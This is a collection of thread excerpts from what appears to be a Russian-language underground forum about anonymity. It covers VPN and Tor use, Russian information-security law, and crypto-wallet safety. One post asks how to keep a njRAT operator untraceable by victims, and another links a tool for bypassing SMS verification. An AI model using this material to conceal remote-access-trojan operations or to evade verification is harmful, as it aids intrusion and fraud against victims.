_Модераторы и форумчане не стесняются редактировать и перемещать тему, если что-то не так или что-то плохо переведено.

Как я уже говорил, я не русский, я сделал это со всей добросовестностью и со всем возможным желанием._

Анонимность MaaS, RAT, Скам/фишинг проектов

ID: 676533bbb4103b69df3719a6
Thread ID: 76258
Created: 2022-11-20T11:21:19+0000
Last Post: 2024-02-15T13:47:53+0000
Author: Aamir El Amari
Replies: 16 Views: 2K

Анонимность при использовании RAT

Доброго времени суток!
Недавно задался вопросом, как можно получить анонимность при использовании какого-либо ратника?
Пример: При пробросе крысы на любую из компьютеров жертвы, он сразу же начинает активно передавать информацию на твою машинку. Однако любой анализатор трафика очень быстро вычеслит тебя, подлёныша, что даст возможность потерпевшему сообщить куда надо. Как же можно избежать этой участи, учитывая привередливость NJrat-а к IP-шнику, что полностью исключает возможность использования VPN-сервиса?
Заранее благодарю за любую информацию по этому поводу!
P.S.: писать, что NJrat изшившее себя гов** - разрешается

Оцените билд по анонимизации.

ID: 676533bbb4103b69df3719a9
Thread ID: 107574
Created: 2024-02-05T21:00:39+0000
Last Post: 2024-02-11T17:27:41+0000
Author: dxcpw
Replies: 33 Views: 2K

Добрый вечер, друзья, прошу, оцените билд по анонимизации, можете прокоментировать, насколько хорош или плох этот билд, что можно добавить/заменить/убавить.
Безымянный.png

Как Whonix, но VPN вместо Tor

ID: 676533bbb4103b69df3719af
Thread ID: 41899
Created: 2020-09-09T11:42:39+0000
Last Post: 2024-02-06T09:02:54+0000
Author: seccway
Replies: 19 Views: 2K

Добрый день, все наверное знают про Whonix, хочу сделать по такой же схеме (одна виртуалка выходит в инет через другую),
но вместо Тor на виртуалке-шлюзе использовать настроенный VPN (wireguard)

Получается так:

виртуалка шлюз (debian + wireguard)
виртуалка рабочая (все ее соединения идут через виртуалку шлюз)

Если кто знает как это сделать, или есть ссылка на манаул, просьба скинуть

VPN не анонимен. Почему нельзя использовать VPN.

ID: 676533bbb4103b69df3719b0
Thread ID: 107447
Created: 2024-02-04T11:42:34+0000
Last Post: 2024-02-05T18:53:53+0000
Author: ThorZirael
Prefix: Видео
Replies: 53 Views: 2K

Не используй VPN пока не посмотришь это видео. В видео рассказываю как спец. службы идентифицируют пользователей VPN.

Мое авторское видео. Задаем вопросы, пишем идеи для следующего видео. Буду рад.

P.S. ребят, видео писалось для ютуба, для самой обычной аудитории. Не для хакеров и про-хакеров)) Если вы все это знали, не плюйтесь пжста.

Законодательство РФ в области информационной безопасности

ID: 676533bbb4103b69df3719d6
Thread ID: 26990
Created: 2018-12-21T17:10:21+0000
Last Post: 2023-12-09T09:39:06+0000
Author: tabac
Replies: 1 Views: 2K

Законодательство РФ в области информационной безопасности

Все специалисты по информационной безопасности рано или поздно сталкиваются с вопросами законодательного регулирования своей деятельности. Первой проблемой при этом обычно является поиск документов, где прописаны те или иные требования. Данный справочник призван помочь в этой беде и содержит подборку ссылок на основные законодательные и нормативно-правовые акты, регламентирующие применение информационных технологий и обеспечение информационной безопасности в Российской Федерации.

Оглавление

Предисловие

Для облегчения восприятия весь массив документов разделен на смысловые блоки, которые применяются для регулирования тех или иных областей информационной безопасности.
К сожалению большая часть приведенных документов применяется для регулирования сразу нескольких областей права, поэтому предложенная классификация весьма условна. Документы в справочнике упоминаются только один раз. Это немного затрудняет поиск, но существенно сокращает объем справочника.

Предлагаемый справочник не является исчерпывающим, но содержит, пожалуй, основные направления обеспечения информационной безопасности в России.

В справочнике, за редким исключением, отсутствуют ссылки на документы ограниченного распространения, национальные стандарты и проекты документов.

Большая часть документов представлена в виде ссылок на справочно-правовую систему «Консультант+», при этом некоторые документы будут недоступны для бесплатного просмотра в рабочее время. Для таких документов рядом с названием в квадратных скобках будет даваться альтернативная ссылка, доступная в рабочее время.

Представленные документы актуальны на момент публикации данного справочника.
Приятного просмотра и успешной работы!

Основы законодательства

_Комментарий. Данный закон и изданные на его основе документы определяют случаи, при которых нормативно-правовые акты государственных регуляторов считаются обязательными к применению._

Стратегические документы

Системообразующие документы

_Комментарий. Данные документы тем или иным образом регулируют практически любую ситуацию, связанную с обеспечением ИБ._

Государственные регуляторы

ФСТЭК России

ФСБ России

Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (Минкомсвязь)

Постановление Правительства РФ от 02.06.2008 N 418 (ред. от 25.09.2018) «О Министерстве цифрового развития, связи и массовых коммуникаций Российской Федерации»

Роскомнадзор

Постановление Правительства РФ от 16.03.2009 N 228 (ред. от 25.09.2018) «О Федеральной службе по надзору в сфере связи, информационных технологий и массовых коммуникаций» (вместе с «Положением о Федеральной службе по надзору в сфере связи, информационных технологий и массовых коммуникаций»)

Банк России

Федеральный закон от 10.07.2002 N 86-ФЗ (ред. от 28.11.2018) «О Центральном банке Российской Федерации (Банке России)»

_Комментарий. Полномочия ЦБ в области ИБ «размазаны» по законодательству, в частности, в законах «О национальной платежной системе», «О безопасности критической информационной инфраструктуры Российской Федерации» и др._

Техническое регулирование

_Комментарий. Здесь под техническим регулированием подразумевается: стандартизация (определение необходимости использования национальных или международных стандартов), определение процедур оценки соответствия средств защиты информации (например, обязательная сертификация), определение мероприятий по аттестации объектов информатизации по требованиям безопасности информации, особенности проведения измерений._

Техническое регулирование. Сертификация средств защиты информации

Федеральный закон от 30.12.2004 N 218-ФЗ (ред. от 03.08.2018) «О кредитных историях»

_Комментарий. Закон устанавливает обязанность использования бюро кредитных историй сертифицированных средств защиты информации._

Техническое регулирование. Аттестация объектов информатизации

_Комментарий. Необходимость обязательной аттестации объектов информатизации по требованиям безопасности информации содержится также и в других документах, например, в Приказе ФСТЭК России от 11.02.2013 N 17 и др._

Лицензирование деятельности в области информационной безопасности

Федеральный закон от 04.05.2011 N 99-ФЗ (ред. от 30.10.2018) «О лицензировании отдельных видов деятельности»

_Комментарий. Лицензирование деятельности, связанной с защитой или обработкой государственной тайны, осуществляется в соответствии с законом «О государственной тайне» и выпущенными на его основе документами._

_Комментарий. В документе содержится исчерпывающий перечень основных руководящих документов ФСТЭК России._

Информационная безопасность и персонал

_Комментарий. Документы определяют: обязанности персонала по обеспечению ИБ, меры дисциплинарной ответственности, особенности обработки ПДн персонала, типовые требования к персоналу, особенности повышения квалификации._

Судебные тяжбы, компьютерная криминалистика

Ответственность за нарушения в области информационной безопасности

_Комментарий. Меры дисциплинарной, гражданско-правовой ответственности, а также требования по компенсации морального вреда описаны в «Трудовом кодексе РФ», «Гражданском кодексе РФ» и других документах._

Руководящие документы ФСТЭК России

_Комментарий. С полным перечнем руководящих документов ФСТЭК России можно ознакомиться в «Перечне технической документации, национальных стандартов и методических документов, необходимых для выполнения работ и оказания услуг, установленных Положением о лицензировании деятельности по технической защите конфиденциальной информации, утвержденным постановлением Правительства Российской Федерации от 3 февраля 2012 г. № 79 (новая редакция)»._

Криптография

Электронная подпись

Федеральный закон от 06.04.2011 N 63-ФЗ (ред. от 23.06.2016) «Об электронной подписи»

_Комментарий. Электронная подпись является одним из видов аналога собственноручной подписи, применение которого регламентируется ГК РФ._

Государственная тайна

Служебная тайна

Постановление Правительства РФ от 03.11.1994 N 1233 (ред. от 18.03.2016) «Об утверждении Положения о порядке обращения со служебной информацией ограниченного распространения в федеральных органах исполнительной власти, уполномоченном органе управления использованием атомной энергии и уполномоченном органе по космической деятельности»[Кодекс]

Коммерческая тайна

Федеральный закон от 29.07.2004 N 98-ФЗ (ред. от 18.04.2018) «О коммерческой тайне»

Банковская тайна

Федеральный закон от 02.12.1990 N 395-1 (ред. от 03.08.2018) «О банках и банковской деятельности»

_Комментарий. Понятие банковской тайны также определено в ГК РФ._

Инсайдерская информация

Защита связи

Государственные и муниципальные информационные системы (ГИС и МИС)

_Комментарий. Основным федеральным законом про государственные (ГИС) и муниципальные информационные системы (МИС) является Федеральный закон от 27.07.2006 N 149-ФЗ._

Федеральный закон от 02.05.2006 N 59-ФЗ (ред. от 27.11.2017) „О порядке рассмотрения обращений граждан Российской Федерации“

_Комментарий. Требования данного закона должны учитываться при разработке ГИС, используемых для взаимодействия с гражданами._

Федеральный закон от 22.12.2008 N 262-ФЗ (ред. от 28.12.2017) „Об обеспечении доступа к информации о деятельности судов в Российской Федерации“

_Комментарий. Описывает особенности использования информационных систем в судах_

Федеральный закон от 09.02.2009 N 8-ФЗ (ред. от 28.12.2017) „Об обеспечении доступа к информации о деятельности государственных органов и органов местного самоуправления“

_Комментарий. Описывает особенности использования информационных систем в государственных органах, в том числе обязанность публиковать перечни используемых информационных систем._

Государственные и муниципальные информационные системы. Обеспечение безопасности

Государственные и муниципальные информационные системы. Открытые данные

Государственные и муниципальные информационные системы. Московская область

Подключение к Интернет государственных систем

Критическая информационная инфраструктура (КИИ)

Государственная система обнаружения, предупреждения и ликвидации последствий компьютерных атак (ГосСОПКА)

_Комментарий. Основным федеральным законом по ГосСОПКА является Федеральный закон от 26.07.2017 N 187-ФЗ. Применение ГосСОПКА тесно связанно с защитой критической информационной инфраструктуры, но в общем случае шире этой задачи._

Персональные данные (ПДн)

_Комментарий. Постановление поясняет понятие „общественный интерес“ при обработке информации, а также дает разъяснения по использованию ГК РФ Статья 152.1. „Охрана изображения гражданина“._

Постановление Пленума Верховного Суда РФ от 23.06.2015 N 25 „О применении судами некоторых положений раздела I части первой Гражданского кодекса Российской Федерации“ [Гарант]

_Комментарий. Постановление поясняет применение ГК РФ Статья 152.1. „Охрана изображения гражданина“._

_Комментарий. Данный документ, пожалуй, является единственным документов в Российском законодательстве, устанавливающим перечень данных, необходимых для идентификации физических лиц._

Персональные данные. Обеспечение безопасности

_Комментарий. Защита персональных данных в государственных и муниципальных информационных системах осуществляется в соответствии с Приказом ФСТЭК России от 11.02.2013 N 17._

Персональные данные. Блокировка нарушителей

_Комментарий. Законодательная основа блокировки нарушителей установлена в Федеральном законе от 27.07.2006 N 149-ФЗ._

Персональные данные. Банковская специфика

Персональные данные. Единая биометрическая система (ЕБС)

_Комментарий. Законодательная основа единой биометрической системы установлена в Федеральном законе от 27.07.2006 N 149-ФЗ._

Персональные данные. Особые случаи обработки ПДн

Персональные данные. Сроки хранения

_Комментарий. Сроки хранения документов по личному составу определяются Федеральным законом от 22 октября 2004 N 125-ФЗ._

Персональные данные. Международные требования

Regulation (EU) 2016/679 of the European Parliament and of the Council of 27 April 2016 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data, and repealing Directive 95/46/EC (General Data Protection Regulation) (Text with EEA relevance)

Персональные данные. Примеры внутренних документов

_Комментарий. Документ устарел, но содержит вполне актуальные примеры внутренних документов._

Национальная платежная система

Банковская безопасность. Нормативно-правовые акты Банка России

Банковская безопасность. Стандарты Банка России

Банковская безопасность. ГОСТы по безопасности

Международные требования по безопасности платежных карт

Автор: imbasoft, взято с хабр.ком

VPN развод от outline.network или кому выгодно чтобы пользовались данным сервисом

ID: 676533bbb4103b69df3719df
Thread ID: 100785
Created: 2023-10-24T09:37:35+0000
Last Post: 2023-11-22T09:06:14+0000
Author: Mikeclover
Prefix: Статья
Replies: 20 Views: 2K

Всем благ в своих начинаниях!)))
Поводом для написания статьи послужили многочисленные советы использования относительно молодого сервиса https://outline.network/ и постоянно мешающий спокойно спать пытливый ум,

Screenshot from 2023-10-24 04-13-22.png
Как заманчиво звучит: "Свободный доступ..." особенно в свете блокировок всеми нами любимых протоколов OpenVPN и Wireguard, не правда ли?
Но как известно, волшебная сила маркетинга порой затмевает разум и заставляет делать вещи о который порой придется пожалеть.

Сразу хочу отметить, что цель статьи уберечь форумчан, серьезно относящихся к своему бизнесу и анонимности, от использования подобных сервисов. А тем, кто хочет просто обойти блокировку - флаг в руки!

Давайте разбираться потихоньку:

_У меня есть приложение Outline, но нет ключа доступа. Где его взять?

Ключи доступа можно сгенерировать только в Менеджере Outline. Если вы знаете кого-то, кто уже настроил сервер с помощью Менеджера Outline, обратитесь к этому человеку. Вы также можете настроить собственный сервер и отправить себе ключ доступа. _https://getoutline.org/ru/faq/
Таким образом мы получаем, что необходимо загрузить некий менеджер (допустим того кто уже сталкивался Вы не знаете ~~и где найти бота в котором продаются ключи Вы тоже не в курсе~~). Переходим к нему...

Вопрос в зрительный зал. Смотря на данное изображение как как Вы думаете кому может быть выгодно использование outline.network?
Если последний вариант это - это установка на собственную VPSку, то как Вы уже догадались сразу три облачных провайдера претендуют на установку у себя docker контейнера с серверной частью.

Если пока ещё остались сомнения, то обратимся к технической части вопроса (моя любимая часть). Заходим на сайт сервиса и ищем там свободно распространяемые ключи к примеру для Нидерландов https://outline.network/access-keys/11109/. Видим великолепно выполненную с точки зрения дизайна страничку, но нас интересует не дизайн, а что представляет из себя ключ:
ss://Y2hhY2hhMjAtaWV0Zi1wb2x5MTMwNTpkeXB5R0g2NExNdmJHRmVzRXRzQQ==@www.outline.network.ak1902.fr8678825324247b8176d59f83c30bd94d23d2e3ac5cd4a743bkwqeikvdyufr.cyou:51348#t.me%2FOutlineVpnOfficial%20%7C%20%281902%29%20NL
Вот сейчас особо не вдаваясь в подробности мы видим, что по такому ключу создастся Shadowsocks соединение. Попробуем понять хотя бы начало:
Y2hhY2hhMjAtaWV0Zi1wb2x5MTMwNTpkeXB5R0g2NExNdmJHRmVzRXRzQQ
https://createssh.net/base64 в помощь... Немного магии: chacha20-ietf- poly1305:dypyGH64LMvbGFesEtsA
Что это за айпишник такой:
dypyGH64LMvbGFesEtsA ????
В этом то и заключается вся соль заявления о том, что сервис нельзя заблокировать. Айпишники не опубликовываются в явном виде!!! Даже для тех кто не знает что такое UDP hole punching должно быть понятно, что кто-то в итоге должен хранить связку открытый ключ - айпишник (возвращаемся к п.2 и вспоминаем как работает протокол bittorrent).
Пора сделать выводы за которыми последует "жара" обсуждений.

Сoutline.network крупнейшие Cloud провайдеры получают двойную прибыль, так как они явно намекают на использование их сервисов при создании своей ноды. Вторая часть прибыли идет за счет анализа Ваших, дорогие мои форумчане, данных, так как именно провайдеры держат пиры (флудфилы по примеру сети i2pd) так необходимые для работы децентрализованной сети.
Для тех кто ставит сервис на свой сервак и гордится этим еще раз повторяю, что обращение на установление соединения идет все равно через Cloud провайдеров, то есть они в итоге сообщают клиенту как дойти до сервака.

p.s. Честные "пацаны" получают сертификаты для сайта на Lets encrypt или Cloudflare, потому что они бесплатные. Обратите внимание кем удостоверен сайт https://outline.network/.

Анонимность, безопасность Linux - обсуждение

ID: 676533bbb4103b69df3719e5
Thread ID: 62257
Created: 2022-01-31T19:01:46+0000
Last Post: 2023-11-19T07:48:10+0000
Author: CombiWombi
Replies: 38 Views: 2K

Привет, ребята, я делаю материал о безопасности Linux, мне нужны хорошие статьи об этом, можете ли вы прислать что-нибудь интересное?

Анонимность, безопасность Starlink

ID: 676533bbb4103b69df3719e8
Thread ID: 88627
Created: 2023-05-22T19:43:17+0000
Last Post: 2023-11-14T19:05:38+0000
Author: goldproduction
Replies: 33 Views: 2K

Всем привет, не нашёл я темы про старлинк, стоит ли брать и как вообще он себя показывает?

Gmail.com, обсуждение

ID: 676533bbb4103b69df3719ef
Thread ID: 53441
Created: 2021-06-29T12:05:50+0000
Last Post: 2023-11-01T20:33:43+0000
Author: Stasyukevich
Replies: 19 Views: 2K

Если отправить письмо с сайта gmail.com на другой почтовый ящик gmail.com
без использования vpn/socks/прокси. Могут ли спец.службы прочитать содержимое письма? или увидеть?
Или им обязательно нужно обращаться с запросом в Google?

Хотелось бы услышать мнение компетентных и умных людей.

P.S. Желательно не из пальца высосанную информацию..

Google сервисы, анонимность и безопасность

ID: 676533bbb4103b69df3719fc
Thread ID: 53819
Created: 2021-07-09T08:22:45+0000
Last Post: 2023-10-10T22:11:35+0000
Author: peacemaker
Replies: 12 Views: 2K

Google собирает данные геолокации со смартфонов, даже если запретить

отслеживание

В иске Аризоны против Google нашли документы, которые подтверждают, что компания собирает данные о местоположении смартфонов даже после того, как пользователи отключают функцию использования местоположения. Кроме того, Google затруднила поиск настроек конфиденциальности для пользователей.

В документах утверждается, что руководители компании и инженеры знали о происходящем. Google оказывала давление на производителей телефонов, заставляя их скрывать настройки конфиденциальности, поскольку они оказались популярными среди пользователей.

Генеральный прокурор Аризоны Марк Брнович подал иск против Google в мае прошлого года. В нем утверждается, что компания незаконно отслеживала местоположение пользователей Android без их согласия, даже если они отключали функции отслеживания. Документы подтверждают, что Google сохраняет отслеживание местоположения в фоновом режиме для некоторых функций, и отключить его можно только на уровне системы.

Представитель Google Хосе Кастанеда [заявил](https://www.theverge.com/2021/5/29/22460070/google-difficult-android- privacy-settings-arizona) The Verge, что Брнович и «конкуренты, участвующие в этом судебном иске, изо всех сил старались неправильно охарактеризовать наши услуги», а компания «всегда встраивала функции конфиденциальности в свои продукты и обеспечивала надежные средства управления данными о местоположении».

Ранее Google внедрила в Android механизм, который ограничивает возможность приложений собирать в фоновом режиме данные о местоположении устройств. Разработчиков обязали получать разрешение на фоновую активацию служб геопозиционирования у Google.

Теперь компания заявляет, что, как и Apple, с 2022 года начнет отображать собираемую приложениями информацию о пользователях. Она будет включать местоположение, сведения о контактах, электронную почту и прочие личные данные. Изменения коснутся не только приложений сторонних разработчиков, но и собственных сервисов Google, обещала компания.

В 2020 году Google обвинили в том, что при внедрении приложений для борьбы с распространением коронавируса на API этой компании и Apple она может определить местонахождение определенных пользователей. Оба гиганта обещали «сохранять конфиденциальность» и не отслеживать местоположение.

Tor: от азов до продвинутого уровня

ID: 676533bbb4103b69df371a01
Thread ID: 91891
Created: 2023-07-02T17:02:21+0000
Last Post: 2023-10-06T04:18:58+0000
Author: baykal
Prefix: Статья
Replies: 6 Views: 2K

Всем привет. Нашел интересную серию статей о TOR на hackware. Буду постепенно добавлять к нам.

Что такое Tor

Имеется несколько разных компонентов и продуктов в имени которых есть слово «Tor». Чтобы ясно представлять, о чём мы говорим, давайте начнём с определения терминов. Tor — это программа, которую вы можете запустить на своём компьютере для подключения к сети Tor. Сеть Tor — это множество компьютеров волонтёров, которые обеспечивают обработку запросов к веб-сайтам и перенаправляют ответ пользователю Tor. Браузер Tor — это комплекс программ, главными компонентами которого являются: Tor + браузер Firefox + плагины и настройки для повышения уровня анонимности.

Для чего используется Tor

Tor может применяться для разных целей:

шифрование данных, чтобы их не мог анализировать Интернет-провайдер или посторонние лица в вашей локальной сети или при использовании открытых сетей.
сокрытие своего IP адреса от конечного веб-сайта
доступ к заблокированным в вашем регионе веб-сайтам

Что выбрать: Tor или VPN или прокси

Если ваша цель зашифровать передаваемые данные, чтобы их не мог анализировать ваш Интернет-провайдер, то может подойти как Tor, так и свой VPN, который вы настроили сами! Я бы не рекомендовал использоваться какими бы то ни было посторонними VPN, поскольку их владелец может видеть весь передаваемый трафик

IP клиента (то есть ваш IP адрес). Если вы используете сторонний VPN сервис, то вы гарантированно получаете соглядатого, который, как минимум, ещё и знает ваш настоящий IP адрес! Если это платный VPN, то он абсолютно не подходит для анонимности, поскольку сервис VPN знаете не только ваш IP и имеет доступ ко всем передаваемым данным, то и по вашим платёжным реквизитам знает кто вы.

Собственноручно настроенный OpenVPN позволяет шифровать передаваемый трафик и объединять свои устройства в виртуальную частную сеть. Также вы можете скрывать свой настоящий IP адрес и обходить блокировки сайтов. Но для анонимности такой вариант не подходит, поскольку для работы OpenVPN необходима аренда VPS, за которую нужно платить. Хотя если для оплаты вы используете криптовалюту или другие анонимные способы, то OpenVPN поможет вам быть анонимным.

Использование одиночного прокси имеет такие же недостатки, как и VPN: соглядатай + прокси-сервис знает ваш настоящий IP адрес. Дополнительный недостаток в отсутствии шифрования — ваш Интернет провайдер по-прежнему может анализировать ваш трафик и даже блокировать доступ к веб-сайтам.

Ситуация с сокрытием IP улучшается если используется цепочка прокси, поскольку (зависит от настроек), каждый следующий прокси знает IP адрес предыдущего узла (всегда) и IP адрес 1 узла перед предыдущим (иногда). Если учесть, что трафик ни на каком этапе не зашифрован, а определённая часть публичных прокси это просто honeypots (предназначены для эксплуатации пользователей), то вариант с прокси не самый лучший способ обеспечить анонимность.

В чём именно помогает Tor

Конечно, у Tor тоже есть свои слабые стороны. Их меньше, но всё равно нужно чётко их понимать.

Давайте обратимся к «комиксам»:

![](/proxy.php?image=https%3A%2F%2Fhackware.ru%2Fwp- content%2Fuploads%2F2019%2F11%2Ftor- https-0.png&hash=bf2b2c8ca03f4b7d826981c43e13671f)

На этой картинке:

жёлтый человечек — это пользователь (вы)
сиреневый человечек — это хакер (на практике присутствует не всегда)
ISP — провайдер Интернет услуг, который делится информацией с полицией и специальными органами. Ещё там работают системные администраторы, которые также (потенциально) имеют доступ к передаваемым данным. Обратите внимание, что изображено 2 интернет провайдера: для пользователя и для веб-сайта. Для сайта в роли ISP обычно выступает хостинг, но принципиально это ничего не меняет: он также может быть обязан предоставлять информацию правоохранительным органам и там тоже работают системные администраторы.
человечки NSA — олицетворяют всех других ISP через которых проходят данные, а также разные магистральные соединения

На первом рисунке показано, что они могут видеть если: 1). Веб-сайт не использует HTTPS; 2) Пользователь не использует Tor.

Условные обозначения:

SITE.COM — сайт, который вы посещаете
USER/PW — ваше имя пользователя и пароль на этом сайте
DATA — данные, передаваемые на этот сайт (написанные комментарии, например)
LOCATION — ваш IP адрес
TOR — используется ли Tor

Как можно увидеть по первой картинке, каждый может видеть абсолютно всё. Стоит ещё добавить — не только видеть, но и любым образом модифицировать!

Давайте рассмотрим вариант, когда веб-сайт использует HTTPS — в настоящее время подавляющее большинство сайтов используют это шифрование:
![](/proxy.php?image=https%3A%2F%2Fhackware.ru%2Fwp- content%2Fuploads%2F2019%2F11%2Ftor- https-1.png&hash=83f73a6c5d572001d430c5b84b883f1f)
Как можно увидеть, соглядатаям доступна только информация о том, какой сайт открыт и кто именно его посетил. Если веб-сайт (хостинг) делится с кем-то информацией, то им доступен полный комплект данных.

Теперь перейдём к варианту, когда используется сеть Tor и когда делается запрос к сайту по HTTP (без использования шифрования HTTPS):
![](/proxy.php?image=https%3A%2F%2Fhackware.ru%2Fwp- content%2Fuploads%2F2019%2F11%2Ftor- https-2.png&hash=e6c90ec0fed1cba595c0ee0557f297ff)
Как можно увидеть, ваш Интернет-провайдер знает ваш IP и знает, что вы используете Tor, но не знает какие именно сайты вы открываете и какие данные отправляете и получаете.

Первый узел Tor знаете ваш настоящий IP и что вы пользуетесь Tor, но больше ничего о передаваемых и запрашиваемых данных не знает.

Второй узел Tor вообще никогда ничего интересного не знает.

А вот с третьим узлом Tor интереснее: он не знаете ваш IP, но он знает передаваемые вами данные и даже ваш логин с паролем. Эта же самая информация доступна соглядатаям на последующих стадиях.

То есть слабые местаTor:

Выходной узел Tor может быть недобросовестным и собирать данные. Но при всём его желании, он не может вас идентифицировать. Хотя, если в качестве логина вы используете email, то появляются зацепки.
Трафик от выходного узла Tor до веб-сайта и обратно также незашифрован.

К счастью, как уже было сказано, сайтов без HTTPS уже не так много.

Если одновременно используется Tor, а сайт работает через HTTPS, то ситуация следующая:
![](/proxy.php?image=https%3A%2F%2Fhackware.ru%2Fwp- content%2Fuploads%2F2019%2F11%2Ftor- https-3.png&hash=b9c744bee9be144dae30f69d3d5bba42)
Главные изменения — выходной узел Tor и последующие соглядатаи больше не могут получить доступ к передаваемым данным и логину/паролю пользователя. Они знают сайт, который был посещён, но не знают кем именно (ваш IP скрыт) и какие данные отправлены и получены (трафик дополнительно зашифрован SSL сертификатом).

Картинки взяты отсюда: https://www.eff.org/pages/tor-and-https — на этой страничке вы можете нажимать интерактивные кнопки и смотреть, что меняется в зависимости от того или иного варианта.

Самый простой способ использовать Tor

Самым простым вариантом выходить в Интернет через Tor является Tor Browser — как это уже упоминалось в самом начале, это специальная сборка веб-браузера Firefox в которую включён Tor. При запуске этого браузера, одновременно запускается программа Tor, а затем этот браузер подключается к Интернету только через сеть Tor.

Дополнительно в веб-браузере имеются плагины, которые препятствуют слежению за пользователем и способствуют анонимности.

Кроме плагинов, в браузере есть настройки, например, не сохранять историю просмотренных страниц и удалять кукиз после закрытия сайта.

Установка Tor Browser в Windows

Скачайте с официального сайта https://www.torproject.org/ru/download/ самораспаковывающийся архив. Запустите его для распаковки. Перейдите в созданный после распаковки каталог и запустите ярлык Start Tor Browser. Нажмите «Соединиться » и дождитесь подключения браузера к сети Tor.

Если вы хотите, чтобы сайты сохраняли введённые вами пароли, то перейдите в Настройки , далее Приватность , снимите галочку «Всегда работать в режиме приватного просмотра ».

Перезапустите браузер.

Перейдите в Настройки , далее Защита и поставьте галочку напротив «Запоминать логины для сайтов ».

Установка Tor Browser в Linux

В первую очередь, поищите пакет Tor Browser в стандартных репозиториях вашего дистрибутива.

В Kali Linux установите Tor Browser по инструкциям на странице: https://kali.tools/?p=2069.

Сервисы для поиска утечек IP адреса

Главные критерии выбора инструмента для обеспечения анонимности своей операционной системы — это функциональность и качество обеспечения анонимности (надёжность перенаправления и блокировки трафика). Оценить уровень анонимности вы можете с помощью следующих сервисов:

Выявление использования средств анонимизации: https://2ip.ru/privacy/
Поиск утечек вашего IP или других данных имеющих значение для анонимности: https://whatleaks.com/
Проверка своего IP, расположения и провайдера Интернет услуг, есть поддержка IPv6 адресов: https://suip.biz/ru/?act=myip
Сервис для поиска заголовков прокси и открытых портов, типичных для средств анонимизации: http://suip.biz/ru/?act=proxy-checker
Проверка, используете ли вы сеть Tor: https://check.torproject.org/ (ВНИМАНИЕ : будьте очень осторожны с этим сервисом — он не поддерживает IPv6. Если на вашем компьютере неправильно настроена маршрутизация трафика, то этот сервис напишет, что используется Tor, хотя весь IPv6 трафик может выходить напрямую, раскрывая ваш IPv6 адрес!)
Поиск разных утечек: http://www.doileak.com/
Поиск утечек DNS: https://dnsleaktest.com/
Что каждый веб-браузер знает о вас: https://webkay.robinlinus.com/
Проверка отпечатков, которые можно собрать с вашего веб-браузера: https://amiunique.org/fp
Посмотреть свой User Agent: https://suip.biz/ru/?act=my-user-agent

Для проверки в командной строке IPv6 адреса и блокировки IPv6 протокола:

Code:Copy to clipboard

curl -6 suip.biz/ip/

Для проверки в командной строке своего IP адреса:

Code:Copy to clipboard

curl suip.biz/ip/

Для проверки используемого DNS сервера:

Code:Copy to clipboard

dig suip.biz | grep SERVER

источник hackware.ru

АнонБокс

ID: 676533bbb4103b69df371a02
Thread ID: 64968
Created: 2022-03-29T07:46:58+0000
Last Post: 2023-10-01T16:00:46+0000
Author: yashechka
Replies: 32 Views: 2K

Случайно наткнулся на такую штуку - <https://www.anonabox.com/buy-anonabox- pro.html>
Кто что думает? Можно ли этой хрени доверять? Если ли ещё другие готовые решения как эти?

Виртуальные номера для SMS и звонков, обсуждение сервисов

ID: 676533bbb4103b69df371a05
Thread ID: 84668
Created: 2023-03-28T07:47:07+0000
Last Post: 2023-09-28T14:42:28+0000
Author: SenjorZeroday
Replies: 22 Views: 2K

Простой инструмент командной строки, с помощью которого вы можете попытаться пропустить
проверку SMS по номеру телефона, используя временный номер телефона, который действует как прокси.

Под капотом эксплуатация сервиса: https://receive-smss.com/

![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F93e54cce356dd11105ac576ad992eed64f4b9d718c1c3c799d526f8ea42ea361%2FNarasimha1997%2Ffake- sms&hash=cd735ab9a8ef7fb16427bcb5c6ba4d77&return_error=1)

[ GitHub - Narasimha1997/fake-sms: A simple command line tool using which

you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy. ](https://github.com/Narasimha1997/fake-sms)

A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy. - GitHub - Narasimha1997/fake-sms: A simple command...

github.com

Безопасность в мире криптовалют

ID: 676533bbb4103b69df371a13
Thread ID: 82454
Created: 2023-02-21T11:50:28+0000
Last Post: 2023-09-03T16:15:28+0000
Author: malloy05
Prefix: Статья
Replies: 13 Views: 2K

Криптовалюты позволяют почувствовать абсолютную свободу действий, но вместе с этим за эту свободу несёте ответственность лишь вы.
Количество пользователей криптовалют растёт, а вместе с тем растёт и число злоумышленников. Методы их работы становятся всё более изощрёнными с каждым годом, причём активность растёт независимо от фаз рынка.
В прошлый раз мы разобрали некоторые мифы про безопасность и пришли к выводу, что защита приватного ключа и доступа к нему – ключевой аспект обеспечения безопасности.
Безопасность — довольно широкая тема и это не ультимативный гайд по ней, а скорее - стартовый чеклист, который многие найдут полезным. Устройство некоторых упомянутых инструментов выходят за рамки этой статьи, однако для любознательных будут ссылки
Ничто не является безопасным на 100%. Просто потому, что в любой цепочке ваших действий, предпринятых для безопасности, есть слабое звено - вы. Потому данный гайд призван значительно снизить , а не исключить риски потери ваших криптоактивов в результате случайной или целевой атаки.
Предлагаю начать издалека и освежить в памяти/узнать, что такое сид-фраза и как она создаётся, чтобы лучше понимать, что же мы защищаем: ТЫК- ВИДЕО

Основные уязвимости

Использование пиратского контента

Один из фундаментальных пунктов, который может подорвать все остальные меры безопасности. Пиратский контент может включать в себя вредоносное ПО.
Речь об операционных системах, ПО, играх, фильмах и т.д. скачанных через торрент и других небезопасных источников.
Лучше заплатить и не переживать за безопасность в будущем - так дешевле.
Кстати, вредоносное ПО - это не всегда история про мгновенную кражу. Злоумышленники крадут логи/куки, хранят сид-фразы кошельков и мониторят баланс. Нет смысла красть у вас 30$, если высока вероятность увеличения баланса при пополнении/хорошем эйрдропе.
Устранение:

С чистого устройства создать новые кошельки и переместить все свои активы туда. Отключите синхронизацию данных приложений-кошельков в iCloud/Google.
Сменить все пароли на почтовых и биржевых аккаунтах, включить 2FA + СМС.
Используйте хотя бы встроенный антивирус и регулярно обновляйте его. Осторожно с переносными носителями информации и тщательно следите за своими устройствами, чтобы ими пользовались только вы - так вы снизите риск заражения. Обращайте внимание на расширение и тип файла.

Смешивание крипты, работы и отдыха

Разделяя крипту, работу, отдых вы значительно повышаете свою продуктивность и внимательность.
Кроме того, имея отдельное устройство для работы с криптой вы снижаете риски его заражения вами или членами вашей семьи.
